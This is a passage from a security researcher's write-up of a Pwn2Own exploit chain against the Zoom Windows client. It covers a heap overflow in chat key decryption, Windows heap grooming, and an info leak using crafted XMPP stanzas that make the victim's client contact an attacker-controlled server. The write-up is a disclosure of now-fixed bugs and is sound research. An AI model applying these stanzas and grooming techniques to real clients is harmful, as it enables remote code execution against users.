Neither of us had used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all the ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full-featured chat client included, with the ability to send images, create group chats, and much more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility into the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat itself uses an XMPP connection. Meetings appear to have a number of different transport options depending on what the network allows, the main one being a custom UDP-based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed to be a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

With the next DLLs we hit a bit of a wall. The disassembly of the other DLLs was almost impossible to get through, due to a large number of calls through vtables and into other DLLs. Almost nothing was available to give us a grip on the disassembled code. The main reason for that was that most DLLs do no logging at all. Logs are of course useful for dynamic analysis, but they can be very useful for static analysis too, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running, nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has an SDK that can be used to integrate the Zoom meeting functionality into other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI-related DLLs are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    LogMessage::LogMessage(local_d0, /* source file */, 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well-known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not reach the other client. Many operations on strings use C++ std::string objects, which means that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.
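To make the size mismatch concrete, here is a small sketch of the two calculations (our own arithmetic, not Zoom's code):

// Base64: 4 input characters decode to 3 output bytes, so a correct upper
// bound for the output of EVP_DecodeBlock is:
function decodedSize(inputLen) {
    return Math.ceil(inputLen / 4) * 3;
}

// What the code above allocates instead: inputLen << 2, i.e. inputLen * 4.
function zoomAllocation(inputLen) {
    return inputLen << 2;
}

console.log(decodedSize(1024));    // 768 bytes actually needed
console.log(zoomAllocation(1024)); // 4096 bytes allocated: too big, not too small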

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <active xmlns=""/>
      <send>[email protected]</send>
      <ssid>[email protected]</ssid>
    <action type="SendMessage">
    <app v="0"/>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
  2. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <active xmlns=""/>
    <from n="Jane Doe" res="ZoomChat_pc"/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="RequestKey">
    <v2data action="None"/>
    <app v="0"/>
  <zmtask feature="50"/>
  3. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <active xmlns=""/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
    <app v="0"/>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>

There are two options for how the key is encrypted, depending on the type of key used by the recipient’s certificate. If it uses an RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but an elliptic curve key on the curve P-521. Algorithms for encrypting directly with elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, an elliptic-curve Diffie-Hellman exchange is performed using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
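A sketch of this construction using the Node.js crypto module (the exact key/IV split Zoom uses is an assumption here):

const crypto = require("crypto");

// Each side has a P-521 key pair; ECDH yields the same shared secret for both.
const sender = crypto.createECDH("secp521r1");
const recipient = crypto.createECDH("secp521r1");
sender.generateKeys();
recipient.generateKeys();

const secret = sender.computeSecret(recipient.getPublicKey()); // 66 bytes for P-521

// Split the shared secret into an AES key and IV (split chosen for illustration).
const key = secret.subarray(0, 32);
const iv = secret.subarray(32, 48);

const cipher = crypto.createCipheriv("aes-256-cbc", key, iv);
const wrappedKey = Buffer.concat([cipher.update("message key"), cipher.final()]);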

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length; it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;

  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();
  if (cVar1 == '\0') {
    return 1;
  }
  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    if (iVar5 < 2) {
      LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      return 1;
    }
    return 1;
  }
  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();
  if (iVar2 == 0) {
    return 0xc;
  }
  local_20 = iVar2;
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);
  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
    }
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);
    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();
      if (iVar2 < 2) {
        LogMessage::LogMessage
                  (local_180, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                   0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
      }
      goto LAB_101ba758;
    }
    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);
    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      return 0;
    }
    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      LogMessage::LogMessage
                (local_180, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  LogMessage::~LogMessage(this);
LAB_101ba852:
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client, but having a legitimate client initiate it requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely, without user interaction, by sending a few chat messages to a user who had previously accepted an external contact request or was in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then, while handling the same packet, used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT heap is what is used here. The NT heap has two different allocators (for allocations of less than about 16 kB): the front-end allocator (known as the Low-Fragmentation Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.
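A toy model of this freelist behaviour (heavily simplified; headers, coalescing and alignment are ignored):

// Sorted list of free blocks; allocation takes the first fit and reinserts the remainder.
let freelist = [{ addr: 0x1000, size: 512 }, { addr: 0x4000, size: 2048 }];

function insertSorted(block) {
    const i = freelist.findIndex((b) => b.size >= block.size);
    if (i === -1) freelist.push(block);
    else freelist.splice(i, 0, block);
}

function allocate(size) {
    const i = freelist.findIndex((b) => b.size >= size);
    if (i === -1) throw new Error("freelist exhausted: extend heap (not modeled)");
    const [block] = freelist.splice(i, 1);
    if (block.size > size)
        insertSorted({ addr: block.addr + size, size: block.size - size }); // split
    return block.addr;
}

console.log(allocate(1040).toString(16)); // "4000"; the 1008-byte remainder is re-listed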

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for sizes that are allocated often, to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets, each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks whether the bucket most recently used for an allocation of that size still has room. If it does not, it checks whether any other bucket for that size range has room. If none do, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.
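Conceptually, the encoding works like this (all values made up):

const heapKey = 0x5ab3c9d1 >>> 0;        // random key, chosen when the heap is created
const header = 0x00410082 >>> 0;         // size/flags fields of a block (example value)
const stored = (header ^ heapKey) >>> 0; // what actually sits in front of the block

// The allocator decodes on use; an overflow cannot write a chosen decoded
// header value without knowing heapKey.
console.log(((stored ^ heapKey) >>> 0) === header); // true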

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same size range are combined in a bucket, so to overwrite a block from a different range you would have to get two buckets placed adjacent to each other. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we had found previously: when we launched Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above that too) were already handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes and thus guaranteed to be placed in an LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLLs, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so that our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But there must also not be any other free blocks of a size between 1040 and 1040 + x, otherwise such a block would be used instead. This means there is a pretty large range of sizes for which no free blocks must be available.

To make arbitrarily sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then the client will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be arbitrarily large, so we had a way to make an allocation of any size. It is also possible to revoke chat messages in Zoom, which also frees the pending key request. This gave us a primitive for allocating and freeing a block of a specific size, but it was quite crude: it would always allocate two copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done with WinDbg, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size, making sure it would no longer affect the freelist, by making the client perform at least 17 allocations of that size.
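A minimal sketch of such a Frida script (a simplified stand-in for the scripts we used; ours also walked the freelist and LFH metadata):

// Log every heap allocation of the size we care about (1040 bytes).
const RtlAllocateHeap = Module.getExportByName("ntdll.dll", "RtlAllocateHeap");

Interceptor.attach(RtlAllocateHeap, {
    onEnter(args) {
        this.size = args[2].toUInt32(); // RtlAllocateHeap(HeapHandle, Flags, Size)
    },
    onLeave(retval) {
        if (this.size === 1040) {
            console.log(`alloc(1040) -> ${retval}`);
        }
    },
});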

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as the objects from libcurl we might want to overwrite. With more sizes, it became more and more likely that at least one of them would already be handled by the LFH, completely breaking our exploit. We weren’t very keen on participating with an exploit that had already failed 75% of the time by the time the application finished launching. We had spent a few weeks trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, let’s look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLLs are loaded at random locations and the locations of the heap and stack are also randomized. However, because Zoom was a 32-bit application, the range of possible addresses for DLLs and for the heap is not very large.
  • DEP (Data Execution Prevention). This means that no memory pages are present that are both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the two OpenSSL DLLs did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.
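Conceptually, the inserted check behaves like this (a model for illustration, not the actual implementation):

// guard_check_icall, conceptually: allow an indirect call only if the target
// is a known valid function start in a CFG-enabled module.
function guardCheckICall(target, validFunctionStarts) {
    if (!validFunctionStarts.has(target)) {
        throw new Error("CFG violation: process is terminated");
    }
}

const validFunctionStarts = new Set([0x10001000, 0x10002340]); // from module metadata
guardCheckICall(0x10001000, validFunctionStarts);   // valid start: call proceeds
// guardCheckICall(0x10001001, validFunctionStarts); // mid-function: would terminate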

Not enabling CFG for a DLL means two things:

  • Any dynamic function call made by this DLL does not check whether the target address is a valid function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another, CFG-enabled DLL to an address inside this DLL is always allowed. The list of valid start locations is not present for this DLL, which means that all addresses in its range are allowed.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLLs to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then free all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks for other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full, so we got a new bucket. Freeing a number of these allocations while keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happened to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality available in the application. A common way would be to allocate something which has a length field, overflow the length field and then read the field back. This did not work for us: we did not find any functionality in Zoom that creates an allocation of 1025-1088 bytes containing a length field which we could also request again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL, it parses and encodes the URL and copies the relevant fields into an internal structure. The path and query components of the URL are stored in separate, heap-allocated blocks with a zero-terminator. Any required URL encoding has already taken place, so when the request is sent, the entire string is copied to the socket up to the first null byte.
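This property is what our leak later abuses: a C string has no length field, so if an overflow replaces the zero-terminator, a subsequent copy keeps reading into the adjacent block. In miniature (simulated memory, made-up contents):

// A "heap" where the URL query is followed by another block containing a pointer.
const memory = Buffer.from("q=AAAA\0\x40\x7a\x15\x70rest-of-next-block\0", "binary");

// Normal send: copy up to the first null byte, so only the query goes out.
console.log(memory.toString("binary", 0, memory.indexOf(0)));

// The overflow rewrites the query *including* its terminator...
memory.write("q=BBBB!", 0, "binary");

// ...so the next send also leaks the adjacent block, pointer bytes and all.
console.log(memory.toString("binary", 0, memory.indexOf(0)));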

We had found a way to initiate HTTPS requests to a server we control: sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is appended to a domain in order to download an image. However, the prepended domain does not end with a /, so it is possible to extend it and end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"se[email protected]","screenname":"John Doe","t":1617178959313}</status>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url=" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with the fixed image domain prepended to it. This means a request is performed to:

"" + image
"" + " vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of the expected domain, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low-impact bugs we used for our attack, which is also now fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over it than over the XMPP connection. The XMPP connection is not direct but goes through the server, which meant that invalid XML would not reach us. As the address we wanted to leak was unlikely to consist entirely of printable characters, we couldn’t get it included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate an HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this is similar to creating an object, overwriting a length field and reading it back. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object used during a TLS handshake to verify a MAC of the transcript, to make sure an active attacker has not changed anything along the way. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;

    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we needed to place three blocks in exactly the right order in a bucket: the block we overflow, the query part of a URL for an HTTPS request we initiated, and a deallocated TLS1_PRF_PKEY_CTX object. One common way of defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we needed enough objects and overflows to have a chance of success, but few enough that deallocated TLS1_PRF_PKEY_CTX objects would remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to strike.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll.

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotiation, and even if you want to renegotiate thousands of times without ever sending an HTTP response, this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This gave us a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did, however, remain the most unstable part of our exploit. If you watch the video of our exploit back, the longest delay is the wait for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt; as you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

